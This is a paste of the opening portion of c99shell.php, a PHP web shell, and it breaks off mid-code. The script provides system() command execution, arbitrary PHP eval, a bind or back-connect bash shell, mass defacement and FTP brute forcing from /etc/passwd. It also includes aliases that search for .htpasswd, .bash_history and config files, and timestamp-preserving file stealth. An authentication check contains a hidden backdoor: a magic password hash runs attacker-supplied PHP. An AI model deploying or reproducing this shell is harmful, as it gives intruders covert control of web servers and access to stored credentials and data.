· 6 years ago · Jun 23, 2019, 12:06 AM
1
2<?php
3/*
4******************************************************************************************************
5*
6* c99shell.php v.1.0 (îò 5.02.2005)
7* Freeware WEB-Shell.
8* © CCTeaM.
9* c99shell.php - øåëë ÷åðåç www-áðîóçåð.
10* Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell
11*
12* WEB: http://ccteam.ru
13* UIN: 656555
14*
15* Âîçìîæíîñòè:
16* ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar)
17* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè
18 ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)
19* ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ)
20* ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ,
21 à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà.
22* ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ)
23* ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
24* ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
25* ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç
26 /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
27* ~ ïðîäâèíóòûé ìåíåäæåð SQL
28* ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl.
29* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
30 èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ,
31 è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
32*
33*
34* 5.02.2005 © Captain Crunch Security TeaM
35*
36* Coded by tristram
37******************************************************************************************************
38*/
39$shver = "1.0 beta (5.02.2005)"; //Current version
40//CONFIGURATION
41$surl = "?"; //link to this script, INCLUDE "?".
42$rootdir = "./"; //e.g "c:", "/","/home"
43$timelimit = 60; //limit of execution this script (seconds).
44//Authentication
45$login = ""; //login
46//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
47$pass = ""; //password
48$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
49$login = false; //turn off authentication
50$autoupdate = true; //Automatic updating?
51$updatenow = false; //If true, update now
52$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
53$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
54$filestealth = 1; //if true, don't change modify&access-time
55$donated_html = ""; //If you publish free shell and you wish
56 //add link to your site or any other information,
57 //put here your html.
58$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
59$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
60$curdir = "./"; //start directory
61$tmpdir = dirname(__FILE__); //Directory for tempory files
62
63// Registered file-types.
64// array(
65// "{action1}"=>array("ext1","ext2","ext3",...),
66// "{action2}"=>array("ext1","ext2","ext3",...),
67// ...
68// )
69$ftypes = array(
70 "html"=>array("html","htm","shtml"),
71 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
72 "exe"=>array("sh","install","bat","cmd"),
73 "ini"=>array("ini","inf"),
74 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
75 "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
76 "sdb"=>array("sdb"),
77 "phpsess"=>array("sess"),
78 "download"=>array("exe","com","pif","src","lnk","zip","rar")
79);
80$hexdump_lines = 8; // lines in hex preview file
81$hexdump_rows = 24; // 16, 24 or 32 bytes in one line
82$nixpwdperpage = 9999; // Get first N lines from /etc/passwd
83$bindport_pass = "c99"; // default password for binding
84$bindport_port = "11457"; // default port for binding
85/* Command-aliases system */
86$aliases = array();
87$aliases[] = array("-----------------------------------------------------------", "ls -la");
88/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
89/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
90/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
91/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
92/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
93/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
94/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
95/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
96/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
97/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
98/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
99/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
100/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
101/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
102/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
103/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
104/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
105/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
106/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
107$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
108$sess_cookie = "c99shvars"; // cookie-variable name
109if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
110$sess_file = $tmpdir."c99shvars_".$sid.".tmp";
111$usefsbuff = true; //Buffer-function
112$copy_unset = false; //Delete copied files from buffer after pasting
113//Quick launch
114$quicklaunch = array();
115$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
116$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
117$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
118$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
119$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
120$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
121$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
122$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
123$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
124$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
125$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
126$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
127$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
128$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
129$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
130$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
131$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
132//Hignlight-code colors
133$highlight_bg = "#FFFFFF";
134$highlight_comment = "#6A6A6A";
135$highlight_default = "#0000BB";
136$highlight_html = "#1300FF";
137$highlight_keyword = "#007700";
138@$f = $_GET[f];
139//END CONFIGURATION
140// \/ Next code not for editing \/
141//Starting calls
142if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
143error_reporting(5);
144@ignore_user_abort(true);
145@set_magic_quotes_runtime(0);
146@set_time_limit(0);
147if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
148if(!ini_get("register_globals")) {import_request_variables("GPC");}
149$starttime = getmicrotime();
150if (get_magic_quotes_gpc())
151{
152if (!function_exists("strips"))
153{
154 function strips(&$el)
155 {
156 if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} }
157 else {$el = stripslashes($el);}
158 }
159}
160strips($GLOBALS);
161}
162$tmp = array();
163foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));}
164$s = "!^(".implode("|",$tmp).")$!i";
165if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
166if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
167elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
168if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
169{
170 header("WWW-Authenticate: Basic realm=\"c99shell\"");
171 header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
172 exit;
173}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];
174$lastdir = realpath(".");
175chdir($curdir);
176if (($selfwrite) or ($updatenow))
177{
178 if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
179 c99sh_getupdate();
180 $data = file_get_contents($c99sh_updatefurl);
181 $fp = fopen($data,"w");
182 fwrite($fp,$data);
183 fclose($fp);
184 exit;
185}
186if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
187if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
188else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
189if (!is_array($sess_data)) {$sess_data = array();}
190if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
191if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
192$sess_data["copy"] = array_unique($sess_data["copy"]);
193$sess_data["cut"] = array_unique($sess_data["cut"]);
194if (!function_exists("c99_sess_put"))
195{
196function c99_sess_put($data)
197{
198 global $sess_method;
199 global $sess_cookie;
200 global $sess_file;
201 global $sess_data;
202 $sess_data = $data;
203 $data = serialize($data);
204 if ($sess_method == "file")
205 {
206 $fp = fopen($sess_file,"w");
207 fwrite($fp,$data);
208 fclose($fp);
209 }
210 else {setcookie($sess_cookie,$data);}
211}
212}
213if (!function_exists("str2mini"))
214{
215function str2mini($content,$len)
216{
217 if (strlen($content) > $len)
218 {
219 $len = ceil($len/2) - 2;
220 return substr($content, 0, $len)."...".substr($content, -$len);
221 }
222 else {return $content;}
223}
224}
225if (!function_exists("view_size"))
226{
227function view_size($size)
228{
229 if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
230 elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
231 elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
232 else {$size = $size . " B";}
233 return $size;
234}
235}
236if (!function_exists("fs_copy_dir"))
237{
238function fs_copy_dir($d,$t)
239{
240 $d = str_replace("\\","/",$d);
241 if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
242 $h = opendir($d);
243 while ($o = readdir($h))
244 {
245 if (($o != ".") and ($o != ".."))
246 {
247 if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
248 else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
249 if (!$ret) {return $ret;}
250 }
251 }
252 return true;
253}
254}
255if (!function_exists("fs_copy_obj"))
256{
257function fs_copy_obj($d,$t)
258{
259 $d = str_replace("\\","/",$d);
260 $t = str_replace("\\","/",$t);
261 if (!is_dir($t)) {mkdir($t);}
262 if (is_dir($d))
263 {
264 if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
265 if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
266 return fs_copy_dir($d,$t);
267 }
268 elseif (is_file($d))
269 {
270 return copy($d,$t);
271 }
272 else {return false;}
273}
274}
275if (!function_exists("fs_move_dir"))
276{
277function fs_move_dir($d,$t)
278{
279 error_reporting(9999);
280 $h = opendir($d);
281 if (!is_dir($t)) {mkdir($t);}
282 while ($o = readdir($h))
283 {
284 if (($o != ".") and ($o != ".."))
285 {
286 $ret = true;
287 if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
288 else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
289 if (!$ret) {return $ret;}
290 }
291 }
292 return true;
293}
294}
295if (!function_exists("fs_move_obj"))
296{
297function fs_move_obj($d,$t)
298{
299 $d = str_replace("\\","/",$d);
300 $t = str_replace("\\","/",$t);
301 if (is_dir($d))
302 {
303 if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
304 if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
305 return fs_move_dir($d,$t);
306 }
307 elseif (is_file($d)) {return rename($d,$t);}
308 else {return false;}
309}
310}
311if (!function_exists("fs_rmdir"))
312{
313function fs_rmdir($d)
314{
315 $h = opendir($d);
316 while ($o = readdir($h))
317 {
318 if (($o != ".") and ($o != ".."))
319 {
320 if (!is_dir($d.$o)) {unlink($d.$o);}
321 else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
322 }
323 }
324 closedir($h);
325 rmdir($d);
326 return !is_dir($d);
327}
328}
329if (!function_exists("fs_rmobj"))
330{
331function fs_rmobj($o)
332{
333 $o = str_replace("\\","/",$o);
334 if (is_dir($o))
335 {
336 if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
337 return fs_rmdir($o);
338 }
339 elseif (is_file($o)) {return unlink($o);}
340 else {return false;}
341}
342}
343if (!function_exists("myshellexec"))
344{
345 function myshellexec($cmd)
346 {
347 return system($cmd);
348 }
349}
350if (!function_exists("view_perms"))
351{
352function view_perms($mode)
353{
354 if (($mode & 0xC000) === 0xC000) {$type = "s";}
355 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
356 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
357 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
358 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
359 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
360 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
361 else {$type = "?";}
362 $owner['read'] = ($mode & 00400) ? "r" : "-";
363 $owner['write'] = ($mode & 00200) ? "w" : "-";
364 $owner['execute'] = ($mode & 00100) ? "x" : "-";
365 $group['read'] = ($mode & 00040) ? "r" : "-";
366 $group['write'] = ($mode & 00020) ? "w" : "-";
367 $group['execute'] = ($mode & 00010) ? "x" : "-";
368 $world['read'] = ($mode & 00004) ? "r" : "-";
369 $world['write'] = ($mode & 00002) ? "w" : "-";
370 $world['execute'] = ($mode & 00001) ? "x" : "-";
371 if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
372 if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
373 if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
374
375 return $type.$owner['read'].$owner['write'].$owner['execute'].
376 $group['read'].$group['write'].$group['execute'].
377 $world['read'].$world['write'].$world['execute'];
378}
379}
380if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
381if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
382if (!function_exists("c99sh_getupdate"))
383{
384function c99sh_getupdate()
385{
386 global $updatenow;
387 $data = @file_get_contents($c99sh_updatefurl);
388 if (!$data) {echo "Can't fetch update-information!";}
389 else
390 {
391 $data = unserialize(base64_decode($data));
392 if (!is_array($data)) {echo "Corrupted update-information!";}
393 else
394 {
395 if ($shver < $data[cur]) {$updatenow = true;}
396 }
397 }
398}
399}
400if (!function_exists("mysql_dump"))
401{
402function mysql_dump($set)
403{
404 $sock = $set["sock"];
405 $db = $set["db"];
406 $print = $set["print"];
407 $nl2br = $set["nl2br"];
408 $file = $set["file"];
409 $add_drop = $set["add_drop"];
410 $tabs = $set["tabs"];
411 $onlytabs = $set["onlytabs"];
412 $ret = array();
413 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
414 if (empty($db)) {$db = "db";}
415 if (empty($print)) {$print = 0;}
416 if (empty($nl2br)) {$nl2br = true;}
417 if (empty($add_drop)) {$add_drop = true;}
418 if (empty($file))
419 {
420 global $win;
421 if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
422 else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
423 }
424 if (!is_array($tabs)) {$tabs = array();}
425 if (empty($add_drop)) {$add_drop = true;}
426 if (sizeof($tabs) == 0)
427 {
428 // retrive tables-list
429 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
430 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
431 }
432 global $SERVER_ADDR;
433 global $SERVER_NAME;
434 $out = "# Dumped by C99Shell.SQL v. ".$shver."
435# Home page: http://ccteam.ru
436#
437# Host settings:
438# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
439# Date: ".date("d.m.Y H:i:s")."
440# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
441#---------------------------------------------------------
442";
443 $c = count($onlytabs);
444 foreach($tabs as $tab)
445 {
446 if ((in_array($tab,$onlytabs)) or (!$c))
447 {
448 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
449 // recieve query for create table structure
450 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
451 if (!$res) {$ret[err][] = mysql_error();}
452 else
453 {
454 $row = mysql_fetch_row($res);
455 $out .= $row[1].";\n\n";
456 // recieve table variables
457 $res = mysql_query("SELECT * FROM `$tab`", $sock);
458 if (mysql_num_rows($res) > 0)
459 {
460 while ($row = mysql_fetch_assoc($res))
461 {
462 $keys = implode("`, `", array_keys($row));
463 $values = array_values($row);
464 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
465 $values = implode("', '", $values);
466 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
467 $out .= $sql;
468 }
469 }
470 }
471 }
472 }
473 $out .= "#---------------------------------------------------------------------------------\n\n";
474 if ($file)
475 {
476 $fp = fopen($file, "w");
477 if (!$fp) {$ret[err][] = 2;}
478 else
479 {
480 fwrite ($fp, $out);
481 fclose ($fp);
482 }
483 }
484 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
485 return $ret;
486}
487}
488if (!function_exists("c99fsearch"))
489{
490function c99fsearch($d)
491{
492 global $found;
493 global $found_d;
494 global $found_f;
495 global $a;
496 if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
497 $handle = opendir($d);
498 while ($f = readdir($handle))
499 {
500 $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
501 if($f != "." && $f != "..")
502 {
503 if (is_dir($d.$f))
504 {
505 if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
506 c99fsearch($d.$f);
507 }
508 else
509 {
510 if ($true)
511 {
512 if (!empty($a[text]))
513 {
514 $r = @file_get_contents($d.$f);
515 if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
516 if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
517
518 if ($a[text_regexp]) {$true = ereg($a[text],$r);}
519 else {$true = strinstr($a[text],$r);}
520 if ($a[text_not])
521 {
522 if ($true) {$true = false;}
523 else {$true = true;}
524 }
525 if ($true) {$found[] = $d.$f; $found_f++;}
526 }
527 else {$found[] = $d.$f; $found_f++;}
528 }
529 }
530 }
531 }
532 closedir($handle);
533}
534}
535//Sending headers
536header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
537header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
538header("Cache-Control: no-store, no-cache, must-revalidate");
539header("Cache-Control: post-check=0, pre-check=0", false);
540header("Pragma: no-cache");
541global $SERVER_SOFTWARE;
542if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
543else {$win = 0;}
544if (empty($tmpdir))
545{
546 if (!$win) {$tmpdir = "/tmp/";}
547 else {$tmpdir = $_ENV[SystemRoot];}
548}
549$tmpdir = str_replace("\\","/",$tmpdir);
550if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
551if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
552{
553 $safemode = true;
554 $hsafemode = "<font color=\"red\">ON (secure)</font>";
555}
556else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
557$v = @ini_get("open_basedir");
558if ($v or strtolower($v) == "on")
559{
560 $openbasedir = true;
561 $hopenbasedir = "<font color=\"red\">".$v."</font>";
562}
563else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
564$sort = htmlspecialchars($sort);
565$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
566@ini_set("highlight.bg",$highlight_bg); //FFFFFF
567@ini_set("highlight.comment",$highlight_comment); //#FF8000
568@ini_set("highlight.default",$highlight_default); //#0000BB
569@ini_set("highlight.html",$highlight_html); //#000000
570@ini_set("highlight.keyword",$highlight_keyword); //#007700
571@ini_set("highlight.string","#DD0000"); //#DD0000
572if ($act != "img")
573{
574if (!is_array($actbox)) {$actbox = array();}
575$dspact = $act = htmlspecialchars($act);
576$disp_fullpath = $ls_arr = $notls = null;
577$ud = urlencode($d);
578?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
579<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo php_uname(); ?></b> </p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php
580$d = str_replace("\\","/",$d);
581if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
582$d = str_replace("\\","/",$d);
583if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
584$dispd = htmlspecialchars($d);
585$pd = $e = explode("/",substr($d,0,strlen($d)-1));
586$i = 0;
587echo "<b>Directory: </b>";
588foreach($pd as $b)
589{
590 $t = "";
591 reset($e);
592 $j = 0;
593 foreach ($e as $r)
594 {
595 $t.= $r."/";
596 if ($j == $i) {break;}
597 $j++;
598 }
599 echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
600 $i++;
601}
602echo " ";
603if (is_writable($d))
604{
605 $wd = true;
606 $wdt = "<font color=\"green\">[ ok ]</font>";
607 echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
608}
609else
610{
